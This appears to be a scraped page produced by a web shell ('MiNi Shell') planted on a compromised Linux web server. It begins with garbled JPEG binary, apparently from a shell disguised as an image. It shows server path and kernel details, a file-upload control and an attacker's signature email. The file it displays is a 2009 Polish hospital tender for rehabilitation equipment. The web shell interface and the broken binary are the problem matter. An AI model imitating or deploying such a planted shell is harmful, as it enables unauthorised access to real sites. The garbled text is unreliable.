JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090121/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090121/23391-N-2009.html

<p class="kh_header"><b>Łódź: dostawa sprzętu rehabilitacyjnego znak sprawy ZP/1/2009r.</b><br>
<b>Numer ogłoszenia: 23391 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej Łódź-Polesie , ul. Andrzeja Struga 86, 90-557 Łódź, woj. łódzkie, tel. centr. 042 6372047 sek 6376450, faks 042 6371373.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zozlodzpolesie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa sprzętu rehabilitacyjnego znak sprawy ZP/1/2009r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi dostawa (zakup) fabrycznie nowego sprzętu  
rehabilitacyjnego, wykazanego poniżej, z dostawą  do jednostek organizacyjnych Zamawiającego oraz zainstalowanie i przeszkolenie personelu.
Opis przedmiotu zamówienia - podział zamówienia na części.
(każda pozycja wskazanego sprzętu stanowi odrębną część zamówienia)
Część 1 zamówienia
Lampa kwarcowa  UVA/B (moc: 120 W) na statywie;  1 szt.
Część 2 zamówienia
Bieżnia treningowa,  wyposażona w komputer (4 dowolnie skalowane programy treningowe,        w tym program sterowany tętnem, umożliwiający pomiar: czasu, prędkości, dystansu, tętna,             z oceną sprawności, bezprzewodowy pas do pomiaru tętna (wyposażenie, silnik elektryczny wysokiej mocy, elektroniczna regulacja prędkości 1 do 16 km/h, elektryczne ustawianie nachylenia   (1-12%), system amortyzatorów,  obciążenie nie mniejsze niż 130 kg ; 1 szt.
Część 3  zamówienia
Aparat do elektroterapii dwukanałowy przeznaczony do wykonywania zabiegów typu : galwanizacja, prądy interferencyjne, prądy TENS, prądy Traberta, prądy Kotza, prądy diadynamiczne ; 1 szt.
Część 4  zamówienia
Stolik pod aparat do elektroterapii o wymiarach: ok.: wysokość 88 cm, szerokość     52 cm, głębokość 49 cm; 1 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.02.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia ubiegać się mogą wykonawcy spełniający następujące warunki:     
1.	     nie podlegają wykluczeniu z udziału w postępowaniu na podstawie art.24  ust. 1 i 2              
		ustawy  z dnia  29 stycznia 2004r. - Prawo zamówień publicznych,
2.	posiadają uprawnienia do wykonywania określonej działalności lub czynności,  jeżeli 	        
ustawy nakładają obowiązek posiadania takich uprawnień,
3.      posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i    
osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie   
innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania   
zamówienia,
4.	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie  zamówienia,
5.	zapewnią realizację zamówienia w terminie określonym w specyfikacji,
6.	zaoferują sprzęt fabrycznie nowy z datą produkcji maksimum  2008r.,
7.	zapewnią bezpłatny serwis gwarancyjny z reakcją na zgłoszenie w ciągu 24h                   oraz serwis pogwarancyjny,
8.	w przypadku braku możliwości natychmiastowej napraw w okresie gwarancji, na żądanie Zamawiającego, zapewnią sprzęt zastępczy, 
9.	posiadają punkt serwisowy zlokalizowany na terenie województwa łódzkiego lub oddalony nie więcej niż 200 km od siedziby Zamawiającego,
10.	na oferowany sprzęt udzielą minimum 12-to miesięcznej gwarancji,
11.	wyrażą zgodę na dokonanie zapłaty w terminie 30-tu dni liczonym od dnia dostarczenia sprzętu oraz faktury, 
12.	akceptują w całości wzór umowy,
13.	spełnią wymogi określone w niniejszej specyfikacji i w ustawie - Prawo zamówień publicznych.
Oceny spełniania tych warunków Zamawiający dokona na podstawie złożonych dokumentów  oraz oświadczeń, metodą spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania przez Wykonawcę warunków określonych w punkcie nr 8      niniejszej specyfikacji, Wykonawca załączy  do oferty w formie  oryginału lub kserokopii poświadczonej  za  zgodność  z  oryginałem  przez  Wykonawcę,  następujące  dokumenty:
1. 	Oświadczenie, że Wykonawca spełnia wymagania art. 22 ustawy Pzp.
2. 	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. 	W przypadku, gdy Wykonawcą jest spółka cywilna lub jawną, obowiązuje dołączenie 
       	umowy tej spółki.
4.	Dokumenty potwierdzające, że oferowany wyrób posiada dopuszczenie do obrotu i do używania oraz oznakowanie znakiem CE - zgodnie z art. 5 ustawy z dnia 20 kwietnia 2004r. o wyrobach medycznych (Dz. U. Nr 93, poz. 869 z późniejszymi zmianami).
5.	Katalogi, foldery lub prospekty wraz z opisami technicznymi oferowanych wyrobów                   w języku polskim, zawierające informacje potwierdzające spełnianie wymagań technicznych określonych w wykazie stanowiącym załącznik nr 1 do specyfikacji,
6.	Dokument określający zasady świadczenia usług serwisowych.
7.	Wykaz punktów serwisowych zlokalizowanych.
8.	Pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - jeśli dotyczy.
9.	Zamawiający żąda wskazania przez wykonawcę w ofercie części zamówienia, której wykonanie powierzy podwykonawcom - jeśli dotyczy.
10.	Parafowany wzór umowy.
11.	Oryginała lub notarialnie potwierdzoną kserokopie pełnomocnictwa dla osoby lub osób 
podpisujących ofertę - upoważnionej/ych do składania woli i do podejmowania zobowiązań                w imieniu Wykonawcy, jeżeli upoważnienie takie nie wynika z dokumentów rejestracyjnych
działalności. Pełnomocnictwo winno jednoznacznie wskazywać osobę lub osoby pełnomocnika poprzez  wskazanie jego  podstawowych danych identyfikacyjnych.
12.	Uzupełnienie złożonych dokumentów po upływie terminu składania ofert jest możliwe na podstawie art. 26 ust. 3 ustawy Prawo   zamówień publicznych.  
13.	Brak jakiegokolwiek z wyżej wymienionych dokumentów lub złożenie ich w   
 niewłaściwej formie, spowoduje odrzucenie oferty.
14.	Złożenie przez Wykonawcę  fałszywych lub stwierdzenia nieprawdziwych  dokumentów 
oraz oświadczeń, zgodnie z art.24 ust. 2 ustawy Pzp spowoduje wykluczenie go z postępowania przetargowego                                   
15.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia i dokumenty wymienione w pkt 1. oraz 2. zostaną przedłożone przez każdego z Wykonawców.
15.1.	Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia, stosownie do art. 23 ust. 2 ustawy Pzp.
15.2.	Dokument pełnomocnictwa musi być załączony do oferty i zawierać w szczególności wskazanie: postępowania o zamówienie publiczne, którego dotyczy, Wykonawców ubiegających się wspólnie o udzielenie zamówienia, ustanowionego Wykonawcę - Pełnomocnika oraz zakres jego umocowania.
15.3.	Dokument pełnomocnictwa musi być podpisany w imieniu wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym Wykonawcę ustawionego jako Pełnomocnika i przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji działalności gospodarczej Wykonawcy.
15.4.	Dokument pełnomocnictwa musi zostać złożony jako część oferty, musi być w oryginale lub kopii poświadczonej za zgodność z oryginałem przez notariusza.
16.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania za granicą, składa dokumenty  wg zasad określonych w Rozporządzeniu Prezesa Rady Ministrów z dnia 12 maja 2006r. (Dz. U. z 2006r., Nr 87, poz. 605).
17.	Wykonawca składający ofertę dotyczącą kilku części zamówienia, załącza jeden komplet określonych wyżej dokumentów..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zozlodzpolesie.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Opieki Zdrowotnej Łódź-Polesie
ul. Andrzeja Struga 86
90-557  Łódź.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.01.2009 godzina 12:00, miejsce: SEKRETARIAT Zamawiającego - adres jak wyżej..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com